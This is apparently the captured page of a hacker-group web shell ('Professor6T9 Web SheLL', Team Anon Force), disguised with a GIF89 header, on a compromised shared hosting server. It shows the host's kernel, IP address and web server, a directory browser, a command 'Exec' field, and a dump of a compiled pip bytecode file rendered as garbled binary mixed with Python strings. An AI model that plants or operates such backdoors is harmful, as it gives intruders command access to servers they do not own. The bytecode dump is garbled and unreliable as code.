GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium22.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
68.65.122.106
/
opt
/
alt
/
python35
/
lib
/
python3.5
/
site-packages
/
pip
/
_internal
/
models
/
__pycache__
[ HOME ]
Exec
Submit
candidate.cpython-35.pyc
��Re� � @ sp d d l m Z d d l m Z d d l m Z e rV d d l m Z d d l m Z Gd d � d e � Z d S) � )�parse)�KeyBasedCompareMixin)�MYPY_CHECK_RUNNING)�_BaseVersion)�Linkc sO e Z d Z d Z d d d g Z � f d d � Z d d � Z d d � Z � S)�InstallationCandidatez9Represents a potential "candidate" for installation. �name�version�linkc sV | | _ t | � | _ | | _ t t | � j d | j | j | j f d t � d S)N�key�defining_class)r � parse_versionr r �superr �__init__)�selfr r r )� __class__� ��/builddir/build/BUILDROOT/alt-python35-pip-20.2.4-5.el8.x86_64/opt/alt/python35/lib/python3.5/site-packages/pip/_internal/models/candidate.pyr s zInstallationCandidate.__init__c C s d j | j | j | j � S)Nz)<InstallationCandidate({!r}, {!r}, {!r})>)�formatr r r )r r r r �__repr__ s zInstallationCandidate.__repr__c C s d j | j | j | j � S)Nz!{!r} candidate (version {} at {}))r r r r )r r r r �__str__"